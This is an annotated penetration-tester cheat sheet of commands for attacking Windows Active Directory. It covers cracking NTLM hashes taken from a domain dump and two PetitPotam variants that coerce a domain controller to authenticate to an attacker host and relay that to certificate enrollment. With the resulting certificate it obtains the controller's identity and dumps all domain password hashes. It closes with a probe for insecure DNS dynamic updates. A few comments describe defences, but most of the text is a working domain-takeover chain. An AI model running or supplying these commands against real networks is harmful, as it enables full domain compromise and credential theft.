# Export in hashcat format (sort of)
# Cheat sheet, not a runnable script: <angle-bracket> tokens are placeholders,
# and the nsupdate/nslookup sections at the bottom are interactive input.
# nxcdb writes the credentials held in its database to "filename". The
# author's "sort of" means the column layout may not be what hashcat expects
# as-is, hence the sed below — look at one exported line before running it.
nxcdb creds export hashcat "filename"
# Prepare NTLM for hashcat
# Deletes alternating colon-delimited fields (each ":x:" becomes ":"), so the
# result depends entirely on the export's column order. Confirm that the field
# that survives is the NT hash before feeding newfilename to hashcat.
sed 's/:[^:]*:/:/g' filename > newfilename
# hashcat for NTLM (DCSync)
# --force suppresses hashcat's startup self-checks (driver/OpenCL warnings);
# prefer fixing the underlying issue and dropping it. -O uses the optimized
# kernels (shorter maximum candidate length), -w 4 is the highest workload
# profile. sudo is only needed if the GPU device nodes are not accessible to
# the current user — otherwise run it unprivileged. The rule file path is
# local to the author's machine; adjust.
sudo hashcat --username -a 0 -m 1000 hashes /usr/share/wordlists/rockyou.txt -r ~/tools/OneRuleToRuleThemStill/OneRuleToRuleThemStill.rule -O -w 4 --force
# --show prints the already-cracked entries from the potfile; it does not crack.
sudo hashcat --username -a 0 -m 1000 hashes --show
# Prefixes every line with "DOMAIN.TLD\" (DOMAIN.TLD is a literal placeholder —
# replace it). Inside double quotes the shell turns \\\\ into \\, which sed
# then emits as a single backslash. crackhound_input.txt contains plaintexts.
sudo hashcat --username -a 0 -m 1000 hashes --show | sed "s/^/DOMAIN.TLD\\\\/" > crackhound_input.txt
# Crack straight from nxc
# -p : sets the field separator, --session=all names the session (restartable
# with --restore), --potfile-path keeps the potfile next to the job instead of
# in ~/.local/share/hashcat. NOTE(review): the meaning of --outfile-format=3
# changed between hashcat 5.x (hash:plain) and 6.x (a single hex_plain field)
# — check `hashcat --help` on the installed version before relying on
# cracked.out's layout.
hashcat -m 1000 -w 3 -O -d 1,2 -a 0 -p : --session=all --username -o cracked.out --outfile-format=3 ../file.ntds rockyou.txt -r OneRuleToRuleThemStill.rule --potfile-path hashcat.pot
# Add shit to Bloodhound
# Neo4j credentials given on the command line land in shell history and are
# visible to other users via ps; "toor" is a well-known default — change it on
# the BloodHound host rather than keeping it in a cheat sheet.
crackhound.py -f crackhound_input.txt -u neo4j -p toor -plaintext -addpw
# PetitPotam
# Defender side for both variants: the relay path into the CA's web enrollment
# endpoint is closed by enforcing Extended Protection for Authentication /
# HTTPS-only on that endpoint and by restricting NTLM; machine-account
# authentications arriving at the CA over HTTP are the thing to alert on.
## Variant 1
Get PetitPotam from "topotam" (github)
pip3 install certipy-ad
# The two trailing positionals are, per PetitPotam's usage, the listener host
# (here the Kali box) and the target DC — confirm against its --help.
python3 PetitPotam.py -u <user> -p <pass> -d <DOMAIN> -dc-ip <DCIP> <KALIIP> <DCIP>
# -target is the CA's web enrollment URL; -template DomainController is what
# makes the resulting certificate usable as the DC's identity below.
certipy-ad relay -target "http://CA.domain.tld" -template DomainController
# "PFXFILE" is a placeholder for the certificate certipy-ad relay wrote.
certipy-ad auth -pfx "PFXFILE" -dc-ip <DCIP>
## Variant 2
python3 PetitPotam.py -u <user> -p <pass> -d <DOMAIN> -dc-ip <DCIP> <KALIIP> <DCIP>
# Absolute path to the Impacket wrapper; "command -v impacket-ntlmrelayx" shows
# whether it is on PATH at all. The relay writes the certificate as base64
# (cert64 below is where that text was saved — confirm the filename).
sudo /usr/bin/impacket-ntlmrelayx -t http://<ca>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Decodes the base64 certificate to a PFX; "base64 -d <cert64" does the same
# without the extra cat.
cat cert64 | base64 -d > cert.pfx
# "PFXFILE" here is presumably the cert.pfx written on the line above.
certipy-ad auth -pfx "PFXFILE" -dc-ip <DCIP>
# Authenticates as the DC machine account with the NT hash (-H) obtained from
# the certificate and dumps NTDS; the output holds every domain hash.
nxc smb -u <dc01$> -H <NTLMHASH> -d <DOMAIN> <DCIP> --ntds
# Insecure DNS
# nsupdate reads the following four lines from stdin. The "update add"
# succeeds only if the zone accepts unauthenticated dynamic updates, which is
# the finding being tested (TTL 5 keeps the probe record short-lived).
# Mitigation on the server: allow secure dynamic updates only. Clean up
# afterwards with "update delete pt.<FQDN> TXT" followed by "send".
nsupdate
server <DNS-Server>
update add pt.<FQDN> 5 TXT "Hello World"
send
quit
# Verification: query the TXT record just added to confirm the update took.
nslookup
server <DNS-Server>
set type=txt
pt.<FQDN>